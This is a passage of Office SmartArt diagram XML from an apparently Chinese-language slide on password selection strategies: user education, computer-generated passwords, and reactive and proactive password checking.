          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B438173E-FFF6-426C-99F9-EAE043E62429}" type="parTrans" cxnId="{275B264F-34EE-44F9-8862-661DBA7D45B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08AE205D-259A-48CB-89D6-F65FFD6AEDC9}" type="sibTrans" cxnId="{275B264F-34EE-44F9-8862-661DBA7D45B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" type="pres">
      <dgm:prSet presAssocID="{F14017A0-F5B3-F948-AAA8-C09873D8BB66}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC589977-9E55-0841-8C2C-349BF4F96BA5}" type="pres">
      <dgm:prSet presAssocID="{92266341-BA3D-5146-A274-02455CA4BE89}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9095F221-BC96-9D48-95F0-76160669036C}" type="pres">
      <dgm:prSet presAssocID="{AC433C7E-FC2E-D244-BE69-511CA97997B7}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9550AAE3-9B3D-214E-A308-1C33F90C09C0}" type="pres">
      <dgm:prSet presAssocID="{1A18AAC5-35A0-F94C-8B7E-91890248F2F3}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9E8B20D-D933-0D49-9AE7-1A4473A25E57}" type="pres">
      <dgm:prSet presAssocID="{E35B2FE7-84F5-424F-A387-DC365EF52297}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8CBA5795-0F69-404C-B653-6EA86B83F3C9}" type="pres">
      <dgm:prSet presAssocID="{58AF6264-22D4-164E-A748-BF2D4994D8DF}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79BA6057-FC85-214D-908A-11FCBEDB77A8}" type="pres">
      <dgm:prSet presAssocID="{E12CAA20-FC13-FB4C-9FA2-299BF18B3F5E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A200CA9-A1EE-4248-9C54-C659ACBA4A78}" type="pres">
      <dgm:prSet presAssocID="{49D64987-2F1D-594F-A09B-BD9FE3E82FC7}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{4155742B-273C-DA4D-87C1-C843E5FED96E}" type="presOf" srcId="{EA65C092-68A8-6842-8BD8-3F31ACC1E4CD}" destId="{4A200CA9-A1EE-4248-9C54-C659ACBA4A78}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{D2453A2D-1A3E-4E73-B9B0-D853373146DB}" srcId="{1A18AAC5-35A0-F94C-8B7E-91890248F2F3}" destId="{35370B48-8489-45B0-93D8-EE158FAA3664}" srcOrd="1" destOrd="0" parTransId="{E31BB95B-644E-4D1D-BB04-1C8F2B6DDAE8}" sibTransId="{4684B26D-C6DB-4C12-9A44-893B92EA04F4}"/>
    <dgm:cxn modelId="{8077312E-C922-D24F-BDAA-EA4ABEBE9E9D}" type="presOf" srcId="{FCE80896-82BA-A241-ACD0-2D7B289A2184}" destId="{8CBA5795-0F69-404C-B653-6EA86B83F3C9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{0BB1712E-9F9D-47F4-991A-9950DA2DB31A}" type="presOf" srcId="{EEC901C7-890B-4C61-8696-FECA7C83BF2D}" destId="{8CBA5795-0F69-404C-B653-6EA86B83F3C9}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{038D9838-8C7C-4C49-A9DF-58A55A96CB70}" srcId="{1A18AAC5-35A0-F94C-8B7E-91890248F2F3}" destId="{A6CA135C-FE19-4B41-8106-8AE3482E7388}" srcOrd="0" destOrd="0" parTransId="{C77A8F1E-C16D-0F48-9516-FC5A0BA1D34F}" sibTransId="{E990F7CB-167C-8C41-A774-11BB6D9B307B}"/>
    <dgm:cxn modelId="{7BDE1A3F-912B-4FED-A7E6-7B89DA0755B6}" srcId="{58AF6264-22D4-164E-A748-BF2D4994D8DF}" destId="{EEC901C7-890B-4C61-8696-FECA7C83BF2D}" srcOrd="1" destOrd="0" parTransId="{DADCBE71-FDC0-4E72-B662-2F7DD6738618}" sibTransId="{21C9BA46-DCB0-4F99-8751-1281ACAA9277}"/>
    <dgm:cxn modelId="{0236FE3F-5741-D84F-AEA7-1B2B9B8FBFD0}" srcId="{F14017A0-F5B3-F948-AAA8-C09873D8BB66}" destId="{49D64987-2F1D-594F-A09B-BD9FE3E82FC7}" srcOrd="3" destOrd="0" parTransId="{2F7669C2-4B8B-A544-A35F-48AEF442BB52}" sibTransId="{6FB9F64C-180B-6D4C-85F9-FD380D2C1C07}"/>
    <dgm:cxn modelId="{D1F8BE63-D465-4750-A808-9B87ECDB39EE}" type="presOf" srcId="{512F0F35-9CDF-4E1E-8882-D2CD0C0ACB7C}" destId="{4A200CA9-A1EE-4248-9C54-C659ACBA4A78}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{CDC10D65-2B82-4040-82AB-143F618D61FD}" srcId="{49D64987-2F1D-594F-A09B-BD9FE3E82FC7}" destId="{EA65C092-68A8-6842-8BD8-3F31ACC1E4CD}" srcOrd="0" destOrd="0" parTransId="{4F04BD0F-9757-2243-ACF6-8245501C5A45}" sibTransId="{F6006AF8-87C7-244B-B0BA-FA61AED8CD85}"/>
    <dgm:cxn modelId="{275B264F-34EE-44F9-8862-661DBA7D45B5}" srcId="{49D64987-2F1D-594F-A09B-BD9FE3E82FC7}" destId="{512F0F35-9CDF-4E1E-8882-D2CD0C0ACB7C}" srcOrd="1" destOrd="0" parTransId="{B438173E-FFF6-426C-99F9-EAE043E62429}" sibTransId="{08AE205D-259A-48CB-89D6-F65FFD6AEDC9}"/>
    <dgm:cxn modelId="{C1C74E77-84E8-DE46-A1B9-94E2D4490474}" srcId="{F14017A0-F5B3-F948-AAA8-C09873D8BB66}" destId="{92266341-BA3D-5146-A274-02455CA4BE89}" srcOrd="0" destOrd="0" parTransId="{342E21F8-DD57-5243-84A9-A8DF9107399D}" sibTransId="{AC433C7E-FC2E-D244-BE69-511CA97997B7}"/>
    <dgm:cxn modelId="{8E99547D-1556-C44C-B961-4EDA972D6C0F}" type="presOf" srcId="{1A18AAC5-35A0-F94C-8B7E-91890248F2F3}" destId="{9550AAE3-9B3D-214E-A308-1C33F90C09C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{A983B387-3A8D-2A4A-AE04-F3EDAA797D01}" srcId="{F14017A0-F5B3-F948-AAA8-C09873D8BB66}" destId="{1A18AAC5-35A0-F94C-8B7E-91890248F2F3}" srcOrd="1" destOrd="0" parTransId="{0EB46D98-34B0-D54F-9D58-FA8B6A952D55}" sibTransId="{E35B2FE7-84F5-424F-A387-DC365EF52297}"/>
    <dgm:cxn modelId="{EDB0B88B-EB58-BF4B-A8B0-A649B2A8B63E}" type="presOf" srcId="{92266341-BA3D-5146-A274-02455CA4BE89}" destId="{FC589977-9E55-0841-8C2C-349BF4F96BA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{5FC4A2A9-494C-6D47-8D2C-AD7622AEC934}" type="presOf" srcId="{49D64987-2F1D-594F-A09B-BD9FE3E82FC7}" destId="{4A200CA9-A1EE-4248-9C54-C659ACBA4A78}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{ABEFB8AD-81C2-E44E-B46A-201C9B99CB88}" srcId="{58AF6264-22D4-164E-A748-BF2D4994D8DF}" destId="{FCE80896-82BA-A241-ACD0-2D7B289A2184}" srcOrd="0" destOrd="0" parTransId="{E9304B34-CF36-1F4D-BC42-151EEC8E3780}" sibTransId="{412A7C64-6513-364E-9E54-23FA6E31A462}"/>
    <dgm:cxn modelId="{176867B4-A15F-6644-B03E-5D8EEB93C627}" srcId="{F14017A0-F5B3-F948-AAA8-C09873D8BB66}" destId="{58AF6264-22D4-164E-A748-BF2D4994D8DF}" srcOrd="2" destOrd="0" parTransId="{FF0A6A7A-7934-CF47-9B5B-E9D5D24AE0A6}" sibTransId="{E12CAA20-FC13-FB4C-9FA2-299BF18B3F5E}"/>
    <dgm:cxn modelId="{61B5CABE-9700-4651-9447-1A4C8596C1F1}" srcId="{92266341-BA3D-5146-A274-02455CA4BE89}" destId="{30494DBF-E200-472B-83C2-954E6834097B}" srcOrd="1" destOrd="0" parTransId="{00A5A8B9-FB3F-4025-8C83-40A45B53D763}" sibTransId="{5C62E108-1FD0-426F-A144-43FCBA01598B}"/>
    <dgm:cxn modelId="{BECB92C4-513B-F946-9E18-D767C615F05A}" type="presOf" srcId="{C87A7D0B-7FD3-254E-8777-92F0D1A2469D}" destId="{FC589977-9E55-0841-8C2C-349BF4F96BA5}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{255042D5-D89B-A147-B928-0CDBCF0E6A51}" srcId="{92266341-BA3D-5146-A274-02455CA4BE89}" destId="{C87A7D0B-7FD3-254E-8777-92F0D1A2469D}" srcOrd="0" destOrd="0" parTransId="{B2274EC3-5634-5C4E-A56F-0E0DC53F5997}" sibTransId="{E1778334-ABAD-DD46-977B-25B6D432C67E}"/>
    <dgm:cxn modelId="{ED1023E0-619B-4FC9-83EC-23CF060EF554}" type="presOf" srcId="{30494DBF-E200-472B-83C2-954E6834097B}" destId="{FC589977-9E55-0841-8C2C-349BF4F96BA5}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{E9D468E1-42AD-AA4B-AF67-CF438DD55F74}" type="presOf" srcId="{58AF6264-22D4-164E-A748-BF2D4994D8DF}" destId="{8CBA5795-0F69-404C-B653-6EA86B83F3C9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{953BB9F7-85D4-41E0-8CD8-09BFA6E003B7}" type="presOf" srcId="{35370B48-8489-45B0-93D8-EE158FAA3664}" destId="{9550AAE3-9B3D-214E-A308-1C33F90C09C0}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{412FB4F8-910D-B24E-8AE1-E11F482261C7}" type="presOf" srcId="{F14017A0-F5B3-F948-AAA8-C09873D8BB66}" destId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{24CAABF9-2A32-7141-B25B-FEEABC191D4A}" type="presOf" srcId="{A6CA135C-FE19-4B41-8106-8AE3482E7388}" destId="{9550AAE3-9B3D-214E-A308-1C33F90C09C0}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{A0A92A1D-9444-3A4A-BDEC-782541B2B4CF}" type="presParOf" srcId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" destId="{FC589977-9E55-0841-8C2C-349BF4F96BA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{FDC70ECF-7592-1945-806F-A37ED16DF9E8}" type="presParOf" srcId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" destId="{9095F221-BC96-9D48-95F0-76160669036C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{02A87FD4-DC23-AE4D-932E-7E74E62CF324}" type="presParOf" srcId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" destId="{9550AAE3-9B3D-214E-A308-1C33F90C09C0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{156D3D24-E61E-0A41-B99D-EC3D1879C001}" type="presParOf" srcId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" destId="{B9E8B20D-D933-0D49-9AE7-1A4473A25E57}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{7B512AA0-0CDE-594C-8F7A-E90698AF4B9E}" type="presParOf" srcId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" destId="{8CBA5795-0F69-404C-B653-6EA86B83F3C9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{4C097153-97F9-AE43-8EBD-65E3A791CD99}" type="presParOf" srcId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" destId="{79BA6057-FC85-214D-908A-11FCBEDB77A8}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{DB0C7A54-6D72-1C4C-8825-06F18DFE02A3}" type="presParOf" srcId="{519A7D20-1A62-D34C-B19B-F744513AA8D6}" destId="{4A200CA9-A1EE-4248-9C54-C659ACBA4A78}" srcOrd="6"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736CC2-214F-4640-8330-BEA3D8564C2C}"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F8DE0C49-8B40-1647-87C4-1C3F7AF8ADBA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>用户教育</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6723C6C6-31B2-6E40-A872-C2C3B8A38EB2}" type="parTrans" cxnId="{3017B0A9-3912-094C-9D46-1F1A44194E87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A7182B5-45B1-934D-B89F-1EE034E63E86}" type="sibTrans" cxnId="{3017B0A9-3912-094C-9D46-1F1A44194E87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85E57A0A-B0E7-BE4F-A53C-B73CAB4BB727}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>计算机生成的密码</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="1400" b="1" i="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{771E22A3-6A5C-CC44-ADC2-33E2A8CA8CED}" type="parTrans" cxnId="{C00859C3-AED5-7D45-BA22-B40FDB62704E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9806375-8868-8E49-8909-DB20B0123CE6}" type="sibTrans" cxnId="{C00859C3-AED5-7D45-BA22-B40FDB62704E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA7233C7-6985-CE42-8895-B56099AB9FBE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Reactive password checking</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>后验口令检验</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="1400" b="1" i="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{350D4152-1017-D347-89B6-6A1F42C3AEC9}" type="parTrans" cxnId="{158982B5-2E0E-A546-BC77-E525C18C2160}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{67BB70CB-3E9B-A24A-966C-004BE1C59191}" type="sibTrans" cxnId="{158982B5-2E0E-A546-BC77-E525C18C2160}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E3F1605-D6A9-4443-AD51-0D55238589D1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Proactive password checking</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>先验口令检验</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="1400" b="1" i="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FB302C6-CB14-4441-8B59-998DD4DA2B2F}" type="parTrans" cxnId="{20C54A20-2F22-B643-A968-E0E60057B2D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0BFC9001-9DEE-584C-BB92-90448BDA5BE8}" type="sibTrans" cxnId="{20C54A20-2F22-B643-A968-E0E60057B2D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84C4C052-9561-914E-BBEA-D7185432C3CE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>允许用户选择自己的密码，但是在选择时，系统会检查密码是否可以允许，否则拒绝</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="1400" b="1" i="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F70800E-1E3B-7442-BF6B-5DB226F2A82A}" type="parTrans" cxnId="{4EABA9BB-8334-B045-991A-E15A6001BE5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C07ED80-9A21-9245-9648-C4703613F7D1}" type="sibTrans" cxnId="{4EABA9BB-8334-B045-991A-E15A6001BE5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C5D0E5F-42CF-46B4-BF44-84147CF17263}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>用户可以被告知使用难以猜测的密码的重要性，并且可以提供选择强密码的准则</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2D32BB8-7392-4E5A-A217-932CABFB419F}" type="parTrans" cxnId="{2EA4E2A3-3867-41C3-AF76-88E26251233F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{346B1383-70E5-40D7-AE01-8D23F01C0B28}" type="sibTrans" cxnId="{2EA4E2A3-3867-41C3-AF76-88E26251233F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B525854-8DFA-428F-B7A8-A71932C43C6A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>计算机生成的密码方案具有用户接受程度差的历史</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78E0DDBB-2C92-475F-AB30-F7E9B3EF13EF}" type="parTrans" cxnId="{24D3E67E-2C18-408A-8633-9DA17D5CD407}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E790C1E-8AD9-4CE2-A7E5-DF2E45689339}" type="sibTrans" cxnId="{24D3E67E-2C18-408A-8633-9DA17D5CD407}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E747673C-7FAC-4B5F-9B3E-9FD69C80F880}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>用户难以记住它们</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4E31B6A-F109-49E9-96BE-25FB6A664F92}" type="parTrans" cxnId="{E0FCDD3E-91A5-49EE-BF45-32DFB6C6F3C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D53CD562-BF4F-4B29-9701-DC85A42F23FE}" type="sibTrans" cxnId="{E0FCDD3E-91A5-49EE-BF45-32DFB6C6F3C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EA1BA18-9616-455F-B07A-C2BF5C91ED23}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>系统定期运行自己的密码破解程序以查找可猜测密码的策略</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E27C8FAE-5D6D-4E18-84E9-438DD07E1A68}" type="parTrans" cxnId="{F6C8E4A2-811A-477E-B453-6391BC2782E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A22748ED-D185-4300-A70C-134E258A6826}" type="sibTrans" cxnId="{F6C8E4A2-811A-477E-B453-6391BC2782E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAECCF87-65C8-794A-A019-9D5581339B88}" type="pres">
      <dgm:prSet presAssocID="{42736CC2-214F-4640-8330-BEA3D8564C2C}" presName="matrix" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{594D0191-5540-ED4D-ABDA-721F7AE06A53}" type="pres">
      <dgm:prSet presAssocID="{42736CC2-214F-4640-8330-BEA3D8564C2C}" presName="diamond" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr>
        <a:solidFill>
